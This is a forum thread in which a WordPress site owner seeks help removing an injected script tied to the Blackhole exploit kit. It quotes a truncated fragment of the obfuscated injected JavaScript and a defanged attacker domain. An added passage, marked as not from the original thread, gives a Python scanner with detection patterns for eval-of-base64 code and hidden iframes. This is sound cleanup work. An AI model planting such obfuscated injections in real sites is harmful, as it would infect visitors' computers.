Here are the results from AVG.
The black hole exploits seem to be pretty active, but not the JavaScript malware.
Thanks kmessinger, I’ve already checked them out. NOTHING says how to find blackhole exploits, that’s all I want to know. Then I can use your links to clean the site.
Hi DSW,
I have an interest in your case, can you please send me a link to your pages (specifically ones which were reported as malicious).
Can you please let me know how users knew they were attacked by blackhole?
thanks,
gadi
Hello gadi.AV, lost my previous account which I posted this topic with. So I’m using this one instead.
Must say that I’m thankful for your interest in helping me!
The problems when users got blocked or warned about my site started about 3 weeks ago, so I took the case to another forum. After some the black hole exploit kit doesn’t show all the time (attacking PCs), so they recommended that I remove the category page, where they found suspected JavaScript.
</div></div> </aside> <!--End Sidebar--> </div> <!--End Container-->
<script type="text/javascript">if('PRgB'=='WIXmQj')eHKuj='ESlJVV';if('KyvNR'=='SETEu')fmxLG();var zSLLL=256;if('Achu'=='sMjaGB')XiGL='ZPjAu';var hv .
So I did remove the category and fixed the threat according to AVG.
The result from AVG can be found here (Link). As you see, the JavaScript threat hasn’t been reported for 30 days.
What’s remaining though is the Blackhole Exploit Kit, which is still active. And that’s the problem, I have only met the virus once. And it was reported as a Trojan, a window with a false antivirus tried to install on my computer. So I’m not really sure what it really is!
Here is a screenshot of Avast reporting an iframe as a threat.
http://www57.zippyshare.com/i/94628030/7608833/Dirtysoundwaves%20-%20virus.jpg
Also my browser (Opera) often blocks my site.
Here is what 28 other web scanners show – https://www.virustotal.com/url/32cbf5296b07dd220d572de32b4432d464e48075a42fc56a77627995eb2e88a9/analysis/1340703454/
You are apparently the only one who can help me.
Thanks!
I still see a malicious script on the site just before the end inner tag.
The script is called from: Referer: dirtysoundwaves(dot)net/category/house-music/ (don’t go there)
and calls an exploit kit from minussqlite(dot)biz (don’t go there 🙂)
There might be other URLs as well in such an attack.
[ code removed – use pastebin instead ]
A Link to the code snippet which is injected:
http://pastebin.com/i75bwYbF
Hmm, it might be that script. But I’ve been trying to figure out how to find the script in “End inner tag”.
Can help you there, I am no wordpress expert.
Look at your theme’s index.php, footer.php and functions.php files. See if there is any strange code at the bottom of the index.php, or at the top of your footer.php file. Or they may have a function that they placed in your functions.php file that is getting called in the footer. Typically it will start out with “eval(base64….”
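The check suggested in the reply above, as an added example that is not part of the original thread: a small Python scanner that walks a theme directory and reports lines matching the `eval(base64...` pattern or a hidden iframe, noting whether each hit is at the top or bottom of its file. The rule names, the extra patterns beyond `eval(base64`, and the sample theme contents are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# The three files named in the post are reported first; every .php file is scanned.
PRIORITY = {"index.php", "footer.php", "functions.php"}

# Heuristics only (assumed rule names): a hit means "read this line", not "confirmed malware".
PATTERNS = {
    "eval-of-decoded-data": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "long-base64-literal": re.compile(r"[\"'][A-Za-z0-9+/=]{200,}[\"']"),
    "hidden-iframe": re.compile(r"<iframe[^>]*display\s*:\s*none", re.I),
}

def scan_theme(theme_dir):
    """Return (file, line, rule, position) for each suspicious line in a theme."""
    hits = []
    for path in Path(theme_dir).rglob("*.php"):
        lines = path.read_text(errors="replace").splitlines()
        for no, line in enumerate(lines, 1):
            where = "top" if no <= 3 else "bottom" if no > len(lines) - 3 else "middle"
            hits += [(path.name, no, rule, where)
                     for rule, rx in PATTERNS.items() if rx.search(line)]
    return sorted(hits, key=lambda h: (h[0] not in PRIORITY, h[0], h[1]))

# Constructed sample theme: harmless stand-ins for injected code, plus a clean file.
SAMPLE = {
    "footer.php": '<?php eval(base64_decode("ZWNobyAnaGknOw==")); ?>\n'
                  "</div>\n<?php wp_footer(); ?>\n</body>\n</html>\n",
    "index.php": "<?php get_header(); ?>\n<div id=\"content\">\n<?php the_content(); ?>\n"
                 "</div>\n<?php get_footer(); ?>\n"
                 '<iframe src="http://example.invalid/" style="display:none"></iframe>\n',
    "functions.php": "<?php\nfunction theme_setup() {\n"
                     "    $token = base64_encode('abc');  // legitimate use, not flagged\n}\n",
}

def demo():
    """Write the sample theme to a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE.items():
            Path(tmp, name).write_text(body)
        return scan_theme(tmp)

if __name__ == "__main__":
    for name, no, rule, where in demo():
        print(f"{name}:{no} [{where}] {rule}")
```

To check a real site, call `scan_theme()` on a downloaded copy of the theme folder and compare every flagged file against a fresh copy of the theme from its original source.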
This is the closest code I found
[Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]
Or this one
[Ditto]
Not sure if it’s right, but I’m really bad at finding harmful codes. All looks the same for me.
I’m actually ready to give admin access just to get rid of the malware.
So if there is any good hearted ones, please!
The code you have listed above is malicious.
[Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]
Wow, never thought I would find it.
Next step would be to remove the codes, I guess?
Copied whole code, don’t know where to remove
[Code moderated as per the Forum Rules. The maximum number of lines of code that you can post in these forums is ten lines. Please use the pastebin]